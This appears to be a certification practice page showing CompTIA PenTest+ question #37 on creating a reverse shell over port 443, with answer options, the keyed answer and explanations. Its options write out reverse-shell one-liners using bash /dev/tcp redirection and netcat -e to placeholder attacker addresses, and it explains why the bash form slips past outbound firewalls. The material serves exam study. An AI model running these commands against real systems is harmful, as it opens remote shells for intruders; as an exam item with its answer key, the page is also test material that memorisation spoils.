CompTIA
PT0-001 · Question #37
PT0-001 Question #37: Real Exam Question with Answer & Explanation
The correct answer is D: bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1. The bash built-in /dev/tcp pseudo-device allows creating a reverse TCP shell without external tools, making it reliable and ideal for exfiltrating a shell over port 443 which is commonly permitted outbound.
Post-exploitation and lateral movement
Question
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
Options
- Aperl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
- Bssh superadmin@<DESTINATIONIP> -p 443
- Cnc -e /bin/sh <SOURCEIP> 443
- Dbash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Explanation
The bash built-in /dev/tcp pseudo-device allows creating a reverse TCP shell without external tools, making it reliable and ideal for exfiltrating a shell over port 443 which is commonly permitted outbound.
Common mistakes.
- A. The Perl snippet is syntactically malformed with unclosed strings and missing semicolons, so it would fail to parse and execute, and it references SOURCEIP rather than the attacker's destination address.
- B. SSH establishes a forward outbound connection requiring valid credentials on the destination and creates an authenticated login session, not a reverse shell tunneled from the victim back to the attacker.
- C. Netcat's -e flag is compiled out of many modern Linux distributions for security reasons, making this method unreliable across varied targets compared to the universally available bash built-in.
Concept tested. Bash reverse shell using built-in /dev/tcp redirection
Reference. https://www.gnu.org/software/bash/manual/bash.html#Redirections
Topics
#reverse shell#bash TCP redirect#port 443#firewall evasion
Community Discussion
No community discussion yet for this question.